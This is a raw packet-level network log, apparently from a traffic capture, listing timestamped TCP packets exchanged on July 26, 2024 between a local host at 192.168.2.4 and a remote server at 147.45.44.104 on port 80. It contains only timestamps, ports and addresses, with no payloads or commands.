Jul 26, 2024 18:56:49.418097019 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.418097973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.418108940 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.418128967 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.418147087 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.418530941 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.418569088 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.418684959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.418695927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.418706894 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.418715954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.418720961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.418725967 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.418735027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.418745041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.418746948 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.418756008 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.418760061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.418775082 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.418776989 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.418783903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.418792009 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.418848038 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.419559956 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.419573069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.419581890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.419591904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.419600964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.419600964 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.419611931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.419621944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.419624090 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.419632912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.419642925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.419652939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.419653893 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.419663906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.419672966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.419676065 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.419683933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.419691086 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.419696093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.419706106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.419708014 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.419734955 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.420372009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.420382977 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.420392036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.420397043 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.420406103 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.420416117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.420418978 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.420428038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.420439005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.420443058 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.420452118 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.420463085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.420470953 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.420473099 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.420490980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.420494080 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.420501947 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.420511961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.420521975 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.420531034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.420531034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.420546055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.420556068 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.420568943 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.420630932 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.421225071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.421235085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.421246052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.421255112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.421263933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.421272993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.421282053 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.421284914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.421297073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.421319008 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.421334028 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.467075109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.467205048 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.467309952 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.467322111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.467330933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.467340946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.467350006 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.467354059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.467364073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.467372894 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.467375994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.467418909 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.467802048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.467812061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.467823029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.467833996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.467840910 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.467844009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.467854977 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.467864990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.467866898 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.467875957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.467886925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.467895985 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.467895985 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.467907906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.467911005 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.467919111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.467937946 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.467962027 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.468599081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.468609095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.468617916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.468626976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.468636036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.468641043 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.468647003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.468657970 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.468658924 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.468668938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.468673944 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.468681097 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.468691111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.468692064 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.468702078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.468707085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.468710899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.468714952 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.468718052 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.468759060 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.487051964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.487066984 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.487077951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.487101078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.487109900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.487117052 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.487122059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.487132072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.487147093 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.487168074 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.500930071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.500946045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.500956059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.501003027 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.501035929 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.501137972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.501149893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.501157999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.501168013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.501178980 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.501178980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.501190901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.501205921 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.501225948 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.501395941 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.501405954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.501415968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.501425028 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.501435995 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.501435995 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.501447916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.501461029 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.501477957 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.501630068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.501641989 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.501672029 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.501694918 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.501889944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.501899004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.501904011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.501909971 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.501919031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.501929045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.501929045 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.501940012 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.501945972 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.501950979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.501967907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.501977921 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.501982927 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.501986980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.501998901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.501998901 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.502011061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.502021074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.502023935 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.502032995 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.502043009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.502048969 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.502060890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.502070904 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.502093077 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.502872944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.502882957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.502913952 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.502938032 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.503019094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.503029108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.503037930 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.503046989 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.503056049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.503057003 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.503067017 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.503074884 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.503077984 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.503088951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.503098965 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.503103971 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.503108978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.503119946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.503122091 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.503132105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.503137112 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.503144979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.503154993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.503164053 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.503191948 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.503957987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.503968000 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.503978014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.503987074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.503998041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.503998995 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.504009008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.504018068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.504021883 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.504029036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.504039049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.504049063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.504050970 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.504060030 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.504067898 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.504070997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.504082918 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.504082918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.504095078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.504105091 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.504107952 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.504139900 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.504774094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.504785061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.504793882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.504802942 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.504812002 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.504813910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.504825115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.504843950 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.504868031 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.538372040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.538383961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.538394928 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.538425922 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.538446903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.538454056 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.538465023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.538475037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.538486958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.538492918 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.538521051 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.560261965 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.560313940 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.560353994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.560364962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.560497999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.560508966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.560512066 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.560523033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.560534954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.560540915 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.560580015 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.560729027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.560786009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.560796022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.560806036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.560822964 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.560842037 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.561379910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.561398983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.561410904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.561423063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.561434031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.561445951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.561456919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.561467886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.561486006 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.561501026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.561506987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.561512947 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.561513901 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.561526060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.561538935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.561549902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.561589003 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.561682940 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.577789068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.577883959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.577893972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.577945948 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.577970028 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.577972889 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.577981949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.577994108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.578003883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.578018904 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.578044891 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.591455936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.591466904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.591480017 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.591514111 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.591553926 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.591584921 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.591597080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.591605902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.591617107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.591630936 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.591650963 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.592318058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.592328072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.592338085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.592350006 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.592360020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.592370033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.592370987 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.592381954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.592387915 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.592395067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.592406034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.592422009 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.592449903 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.592999935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.593046904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.593056917 CEST	80	49757	147.45.44.104	192.168.2.4
